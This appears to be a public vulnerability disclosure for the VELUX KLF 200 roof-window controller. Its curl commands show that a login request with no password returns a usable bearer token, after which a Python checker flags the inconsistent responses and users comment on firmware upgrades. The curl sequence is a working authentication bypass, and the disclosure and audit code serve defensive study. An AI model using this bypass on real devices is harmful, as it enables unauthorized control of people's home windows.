Another episode of Internet Of Things done wrong. This exploit is so trivial, I would not even call it an exploit.
VELUX[0] is the leading manufacturer of roof windows (they are really great!). VELUX KLF 200 is a device to control VELUX windows over ethernet/internet[1]. The KLF 200 device has an undocumented API for executing scenes, in other words opening and closing VELUX windows.
Expected behaviour with correct password:
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login","params":{"password":"velux123"}}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":true,"deviceStatus":"IDLE","data":{},"errors":[]}
Expected behaviour with wrong password:
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login","params":{"password":"fnord"}}'
)]}',
{"result":false,"deviceStatus":"IDLE","data":{},"errors":[401]}
Login without password token:
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login"}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":false,"deviceStatus":"IDLE","data":{},"errors":[999]}
... returning a valid token:
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/products' -H 'Authorization: Bearer 6XmONGhWRF5Wcu4XrTHZLA==' -X POST -d '{"action":"get"}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":true,"deviceStatus":"IDLE","data":[...],"errors":[]}
I assume this is not expected behaviour.
Current version: 0.1.1.0.41.0
[0] http://www.velux.com/
[1] http://velcdn.azureedge.net/~/media/marketing/de/dokumente/pdf/produktanleitungen/produktdatenblatt/integra/velux-produktdatenblatt-integra-interface-klf200.pdf?la=de-de
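A response-side consistency check, added here as an example and not part of the report or of the device's software: it strips the `)]}',` prefix the KLF 200 puts in front of every JSON body and flags a login response that hands out a token while `result` is false or `errors` is non-empty, which is exactly the inconsistency shown above. The sample responses are constructed from the curl output in the report.

```python
import json
from typing import List

# The KLF 200 prefixes every JSON body with the anti-JSON-hijacking
# marker ")]}'," seen in the curl output; it must be removed before parsing.
KLF_PREFIX = ")]}',"


def parse_klf_response(raw: str) -> dict:
    """Strip the )]}', prefix (if present) and decode the JSON body."""
    body = raw.strip()
    if body.startswith(KLF_PREFIX):
        body = body[len(KLF_PREFIX):]
    return json.loads(body)


def audit_login_response(raw: str) -> List[str]:
    """Return a list of findings; an empty list means the response is consistent.

    A login response must carry a token only when result is true and errors
    is empty. A token next to result=false is a session handed out without
    successful authentication.
    """
    resp = parse_klf_response(raw)
    findings = []
    has_token = bool(resp.get("token"))
    login_ok = resp.get("result") is True and not resp.get("errors")
    if has_token and not login_ok:
        findings.append(
            "token issued although login failed (result=%r, errors=%r)"
            % (resp.get("result"), resp.get("errors"))
        )
    if login_ok and not has_token:
        findings.append("login reported successful but no token returned")
    return findings


# Constructed samples reproducing the three auth responses from the report.
TOKEN = "6XmONGhWRF5Wcu4XrTHZLA=="
SAMPLE_OK = KLF_PREFIX + "\n" + json.dumps(
    {"token": TOKEN, "result": True, "deviceStatus": "IDLE", "data": {}, "errors": []})
SAMPLE_WRONG_PW = KLF_PREFIX + "\n" + json.dumps(
    {"result": False, "deviceStatus": "IDLE", "data": {}, "errors": [401]})
SAMPLE_NO_PW = KLF_PREFIX + "\n" + json.dumps(
    {"token": TOKEN, "result": False, "deviceStatus": "IDLE", "data": {}, "errors": [999]})

if __name__ == "__main__":
    for name, sample in [("correct password", SAMPLE_OK),
                         ("wrong password", SAMPLE_WRONG_PW),
                         ("no password", SAMPLE_NO_PW)]:
        print(name, "->", audit_login_response(sample) or "consistent")
```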
Hello, beware, my German ist nicht gut, but I managed to understand that all the scenes are deleted during the upgrade process, and the rediscovery of the shutters and getting them paired was pretty hectic for the user reporting it.
@Sven-H-x how did you manage to get this link? Do you by any chance have the release notes?